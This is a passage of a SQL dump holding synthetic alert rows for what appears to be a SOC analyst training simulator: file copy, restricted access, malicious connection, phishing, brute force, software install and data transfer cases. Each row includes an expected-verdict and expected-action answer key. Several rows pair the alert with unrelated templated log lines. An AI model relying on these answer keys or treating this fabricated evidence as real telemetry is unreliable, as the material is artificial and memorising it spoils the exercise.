2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:00Z\\\",\\\"event_type\\\":\\\"file_copy\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-123\\\",\\\"command_line\\\":\\\"copy C:\\\\\\\\Sensitive\\\\\\\\report.pdf E:\\\\\\\\\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.984Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:00Z\\\",\\\"event_type\\\":\\\"file_copy\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-123\\\",\\\"command_line\\\":\\\"copy C:\\\\\\\\Sensitive\\\\\\\\report.pdf E:\\\\\\\\\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.984Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:00Z\\\",\\\"event_type\\\":\\\"file_copy\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-123\\\",\\\"command_line\\\":\\\"copy C:\\\\\\\\Sensitive\\\\\\\\report.pdf E:\\\\\\\\\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1432, 'Unauthorized File Access Attempt', 'medium', 'Microsoft Purview', 'An employee attempted to access restricted files on the corporate server. This access attempt was blocked.', 'Data Exfil', 'T1078', 1, 'investigating', NULL, '{\"timestamp\":\"2026-03-02T09:15:00Z\",\"event_type\":\"file_access\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"10.0.0.5\",\"username\":\"jdoe\",\"hostname\":\"CORP-DESK-456\",\"command_line\":\"open \\\\\\\\10.0.0.5\\\\Restricted\\\\confidential.docx\"}', '2026-03-02 03:22:47', '2026-03-09 14:29:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP address of the employee\'s workstation\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP address of the corporate server\"}}],\"expected_actions\":[\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The attempt to access restricted files indicates a possible insider threat.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:00Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-456\\\",\\\"command_line\\\":\\\"open 
\\\\\\\\\\\\\\\\10.0.0.5\\\\\\\\Restricted\\\\\\\\confidential.docx\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:00Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-456\\\",\\\"command_line\\\":\\\"open \\\\\\\\\\\\\\\\10.0.0.5\\\\\\\\Restricted\\\\\\\\confidential.docx\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:00Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-456\\\",\\\"command_line\\\":\\\"open \\\\\\\\\\\\\\\\10.0.0.5\\\\\\\\Restricted\\\\\\\\confidential.docx\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:00Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-456\\\",\\\"command_line\\\":\\\"open \\\\\\\\\\\\\\\\10.0.0.5\\\\\\\\Restricted\\\\\\\\confidential.docx\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin 
from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:00Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-456\\\",\\\"command_line\\\":\\\"open \\\\\\\\\\\\\\\\10.0.0.5\\\\\\\\Restricted\\\\\\\\confidential.docx\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1433, 'Suspicious Network Connection Detected', 'critical', 'Netskope', 'A suspicious outbound connection to a known malicious IP was detected from an internal host.', 'Malware', 'T1078', 1, 'investigating', 234, '{\"timestamp\":\"2026-03-02T10:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"203.0.113.50\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAP-789\"}', '2026-03-02 03:22:47', '2026-03-03 19:44:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the employee\'s device\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for malware distribution\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The destination IP is associated with known malware distribution, confirming the malicious intent.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-789\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-789\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-789\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-789\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-789\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1434, 'Phishing Attempt Detected', 'high', 'Forcepoint', 'A phishing email was received with a link to a known malicious site. The email was flagged and quarantined.', 'Phishing', 'T1566', 1, 'investigating', 247, '{\"timestamp\":\"2026-03-02T11:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"hostname\":\"CORP-DESK-101\",\"email_sender\":\"phisher@maliciousdomain.com\",\"url\":\"http://maliciousdomain.com/login\"}', '2026-03-02 03:22:47', '2026-03-07 01:25:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Email address linked to multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL used for credential harvesting attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The phishing email contains a link to a malicious domain, warranting immediate action.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.989Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-101\\\",\\\"email_sender\\\":\\\"phisher@maliciousdomain.com\\\",\\\"url\\\":\\\"http://maliciousdomain.com/login\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.989Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-101\\\",\\\"email_sender\\\":\\\"phisher@maliciousdomain.com\\\",\\\"url\\\":\\\"http://maliciousdomain.com/login\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.989Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-101\\\",\\\"email_sender\\\":\\\"phisher@maliciousdomain.com\\\",\\\"url\\\":\\\"http://maliciousdomain.com/login\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.989Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-101\\\",\\\"email_sender\\\":\\\"phisher@maliciousdomain.com\\\",\\\"url\\\":\\\"http://maliciousdomain.com/login\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.989Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-101\\\",\\\"email_sender\\\":\\\"phisher@maliciousdomain.com\\\",\\\"url\\\":\\\"http://maliciousdomain.com/login\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1435, 'Unusual Login Activity Detected', 'medium', 'Microsoft Purview', 'Multiple failed login attempts were recorded from a foreign IP address, indicating a potential brute force attack.', 'Credential Attack', 'T1078', 1, 'investigating', 237, '{\"timestamp\":\"2026-03-02T12:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.60\",\"dst_ip\":\"192.168.1.30\",\"username\":\"jdoe\",\"hostname\":\"CORP-SVR-202\",\"failed_attempts\":25}', '2026-03-02 03:22:47', '2026-03-04 16:07:10', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for multiple brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP address of the corporate server\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The foreign IP is associated with known brute force activities, confirming the attack.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.991Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-202\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-02T13:54:06.991Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 
49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-202\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-02T13:53:06.991Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-202\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-02T13:52:06.991Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-202\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-02T13:51:06.991Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-202\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1436, 'Unauthorized Software Installation Detected', 'medium', 'Symantec DLP', 'An employee attempted to install unauthorized software on their workstation, which was detected by DLP policies.', 'Malware', 'T1059', 0, 'investigating', NULL, '{\"timestamp\":\"2026-03-02T13:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.35\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"CORP-DESK-303\",\"command_line\":\"msiexec /i C:\\\\Downloads\\\\unknownapp.msi\"}', '2026-03-02 03:22:47', '2026-03-04 16:18:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.35\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP address of the employee\'s workstation\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"msiexec /i C:\\\\Downloads\\\\unknownapp.msi\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command related to software installation, not malicious\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The installation attempt was benign as the software was legitimate but unknown to the system.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.992Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.35\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-303\\\",\\\"command_line\\\":\\\"msiexec /i 
C:\\\\\\\\Downloads\\\\\\\\unknownapp.msi\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.992Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.35\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-303\\\",\\\"command_line\\\":\\\"msiexec /i C:\\\\\\\\Downloads\\\\\\\\unknownapp.msi\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.992Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.35\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-303\\\",\\\"command_line\\\":\\\"msiexec /i C:\\\\\\\\Downloads\\\\\\\\unknownapp.msi\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.992Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.35\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-303\\\",\\\"command_line\\\":\\\"msiexec /i C:\\\\\\\\Downloads\\\\\\\\unknownapp.msi\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.992Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.35\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-303\\\",\\\"command_line\\\":\\\"msiexec /i C:\\\\\\\\Downloads\\\\\\\\unknownapp.msi\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1437, 'Abnormal Data Transfer Detected', 'high', 'Forcepoint', 'A large volume of sensitive data was transferred to an external IP address, triggering a policy violation alert.', 'Data Exfil', 'T1059', 1, 'investigating', 222, '{\"timestamp\":\"2026-03-02T14:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.40\",\"dst_ip\":\"198.51.100.10\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAP-404\"}', '2026-03-02 03:22:47', '2026-03-08 14:05:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP of the user\'s laptop\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 500 times for data exfiltration activities\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is linked to known data exfiltration activities, confirming malicious intent.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.994Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-404\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.994Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-404\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.994Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-404\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.994Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-404\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.994Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 